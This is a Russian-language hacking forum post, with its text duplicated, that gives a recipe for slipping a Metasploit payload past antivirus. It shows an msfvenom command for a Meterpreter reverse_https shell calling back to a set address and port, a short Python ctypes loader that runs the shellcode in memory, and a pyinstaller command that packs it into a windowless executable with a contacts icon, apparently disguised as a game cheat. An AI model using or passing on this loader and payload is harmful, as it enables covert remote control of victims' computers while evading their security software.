Achtung
New member
Обход антивируса с помощью ctypes (python)
Привет всем
Сегодня покажу очень простенький пример обхода антивируса с помощью библиотеки ctypes в языке программирования python.
Суть обхода в том эта библиотека дает нам возможность выполнять код C|C++ в питоновском скрипте.
И мы смело сможем запустить шеллкод метасплоита в оперативной памяти.
Вы уж простите много писать пока не буду,времени очень мало у меня,отпишу потом пояснения в коментариях если возникнут вопросы у кого то .))
Вообщем ближе к делу
И так проделываем следующие шаги:
1) Создаем шеллкод командой:
Код:
msfvenom -p windows/meterpreter/reverse_https lport=1337 lhost=192.168.137.137 -b x0ax0bxff -f c
тут ничего пояснять думаю не нужно ,лишь обратить внимания стоит на параметр -b которым мы указываем которые плохие символы в шеллкоде нужно не использовать.
Дальше создаем скрипт на питоне следующого вида:
Код:
from ctypes import *
shellcode = ("Тут_копипастим_наш шеллкод_созданный_через_msf_venom");
tralivali = create_string_buffer(shellcode, len(shellcode))
shell = cast(tralivali, CFUNCTYPE(c_void_p))
shell()
Собираем через pyinstaller на Windows системе..
Код:
Cython27Scriptspyinstaller.exe -F --noconsole --onefile --icon=C:UsersCorpOfHackDesktopcontacts.ico C:UsersCorpOfHackDesktopSuperCheat.py
Все!
Привет всем
Сегодня покажу очень простенький пример обхода антивируса с помощью библиотеки ctypes в языке программирования python.
Суть обхода в том эта библиотека дает нам возможность выполнять код C|C++ в питоновском скрипте.
И мы смело сможем запустить шеллкод метасплоита в оперативной памяти.
Вы уж простите много писать пока не буду,времени очень мало у меня,отпишу потом пояснения в коментариях если возникнут вопросы у кого то .))
Вообщем ближе к делу
И так проделываем следующие шаги:
1) Создаем шеллкод командой:
Код:
msfvenom -p windows/meterpreter/reverse_https lport=1337 lhost=192.168.137.137 -b x0ax0bxff -f c
тут ничего пояснять думаю не нужно ,лишь обратить внимания стоит на параметр -b которым мы указываем которые плохие символы в шеллкоде нужно не использовать.
Дальше создаем скрипт на питоне следующого вида:
Код:
from ctypes import *
shellcode = ("Тут_копипастим_наш шеллкод_созданный_через_msf_venom");
tralivali = create_string_buffer(shellcode, len(shellcode))
shell = cast(tralivali, CFUNCTYPE(c_void_p))
shell()
Собираем через pyinstaller на Windows системе..
Код:
Cython27Scriptspyinstaller.exe -F --noconsole --onefile --icon=C:UsersCorpOfHackDesktopcontacts.ico C:UsersCorpOfHackDesktopSuperCheat.py
Все!